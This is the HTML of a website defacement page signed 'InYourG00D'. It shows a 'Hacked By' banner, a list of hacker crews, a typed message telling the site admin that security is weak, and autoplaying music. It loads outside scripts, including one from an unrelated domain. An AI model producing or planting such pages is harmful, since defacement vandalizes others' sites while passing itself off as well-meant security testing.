<htm>
<head>
<title>InYourG00D</title>
<link rel="SHORTCUT ICON" href="http://4umi.com/image/icon/smiley/disco.gif">
<meta content='Hacked By InYourG00D' name='description'/>
<meta content='Hecked By InYourG00D' name='keywords'/>
<script type="text/javascript" src="http://www.sis-kj.com/js/3.js"></script>
<body background =' # 'bgcolor='black'>

<script type='text/javascript'>
var DADrightclicktheme = 'Dark';
var DADrightclickimage = 'http://picturestack.com/44/578/hIHgembelzkaylR8.jpg';</script>
<script type='text/javascript' src="http://tuyulz-blogspot.googlecode.com/files/Anti%20Klik.js"> </script>
</head>


<style>body{cursor: url(http://4umi.com/image/icon/smiley/disco.gif), progress !important;background:black repeat center;color:lime;} .kotak{text-align:center;background:transparant;border:solid lime
2px;border-radius:15px;position:fixed;top:2px;left:390px;left:1px;right:1px;}.kotak1{text-align:center;background:transparant;border:solid lime 2px;border-radius:15px;position:fixed;bottom:2px;left:1px;right:1px;}</style><br/><br/>

<center style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;">
 <img height="180" src="http://picturestack.com/32/429/6VgdiskoPv5.gif" width="200" /></center>

<center style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;">
 <img height="180" src="http://picturestack.com/32/429/6VgdiskoPv5.gif" width="200" /></center>

<center><center style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;">
 <img height="180" src="http://picturestack.com/32/429/6VgdiskoPv5.gif" width="200" /></center>

<center style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;">
 <img height="180" src="http://picturestack.com/32/429/6VgdiskoPv5.gif" width="200" /></center>
<br />



<div class="kotak">....::::::Hacked By InYourG00D::::::....</div><div class="kotak1">| Thanks to : <blink>LNX#CREW - S0UL T3AM CYB3R - 2Easy4Hack - 3xploit - Pku.LNX# - X-W4R30N - Amino7171 - InYourG00D - XpL3Z - DriXploit - ./c0d3x.3rr - X PL0Y - Vijune15 - Mr.Delay - InYourJackers - Look-T - Mr.Fish - Tuan Badut -IY_WannabeID -</blink></div></center>

<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
 <DIV align="center"><SPAN style="FILTER: blur(add=1,direction=170,strength=30); HEIGHT: 50px"> 
    <STYLE> .layermensaje {
        FONT-SIZE: 10pt;LINE-HEIGHT: 10pt; FONT-FAMILY: "Arial"}
    </STYLE> 
    <FONT style="FONT-SIZE: 20pt" face="Courier New"> 
      <script type="text/javascript"> 
        var charIndex = -1;
        var stringLength = 0;
        var inputText;
        function writeContent(init)
        {if(init)
          { inputText = document.getElementById('contentToWrite').innerHTML; }if(charIndex==-1)
          {charIndex = 0;stringLength = inputText.length;}var initString = document.getElementById('myContent').innerHTML;
          initString = initString.replace(/<SPAN.*$/gi,"");
          var theChar = inputText.charAt(charIndex);
          var nextFourChars = inputText.substr(charIndex,4);
          if(nextFourChars=='<BR>' || nextFourChars=='<br>')
          {theChar  = '<BR>';charIndex+=3;}initString = initString + theChar + "<SPAN id='blink'>></SPAN>";
          document.getElementById('myContent').innerHTML = initString;
          charIndex = charIndex/1 +1;
          if(charIndex%2==1)
          { document.getElementById('blink').style.display='none';}else
          {document.getElementById('blink').style.display='inline';}
          if(charIndex<=stringLength)
          {setTimeout('writeContent(false)',100);} else
          {blinkSpan();}} var currentStyle = 'inline';function blinkSpan() {if(currentStyle=='inline')
          {currentStyle='none';}else
          {currentStyle='inline';} document.getElementById('blink').style.display = currentStyle;
          setTimeout('blinkSpan()',400);} msg = ""; msg = " " + msg;pos = 0;function scrollMSG()
        {document.title = msg.substring(pos, msg.length) + msg.substring(0, pos);
          pos++;if (pos >  msg.length) pos = 0
          window.setTimeout("scrollMSG()",100);}
        scrollMSG();
      </script> 
            <td> 
              <div id="myContent" class="tip"> </div> 
              <div id="contentToWrite" style="display:none" text-decoration:"overline" class="tip">
...Hi Admin Ganss ... <br/>
...The appearance of your security is weak<br/>
...I Only Test the Security of Your Site<br/>
...Please you Strengthen the security of your site<br/>
...our intentions are good<br/><br/>
...greetings InYourG00D The child is hurt and lacks affection: '(<br/><br/>
..........Connecting Close..........</div> 
</td> 
</tr> 
</table> 
<p>&nbsp;</p> 

<script type="text/javascript"> 
writeContent(true);
</script> 
 
        

<object height="0" width="100%"><param name="movie" value="https://player.soundcloud.com/player.swf?url=http%3A%2F%2Fapi.soundcloud.com%2Ftracks%2F70313651&amp;color=ff6600&amp;auto_play=true&amp;show_artwork=false&amp;show_playcount=false&amp;show_comments=false"></param><param name="allowscriptaccess" value="always"></param><embed allowscriptaccess="always" src="https://player.soundcloud.com/player.swf?url=http%3A%2F%2Fapi.soundcloud.com%2Ftracks%2F70313651&amp;color=ff6600&amp;auto_play=true&amp;show_artwork=false&amp;show_playcount=false&amp;show_comments=false" type="application/x-shockwave-flash" width="100%" height="0"></embed>
</div></center><br /><br />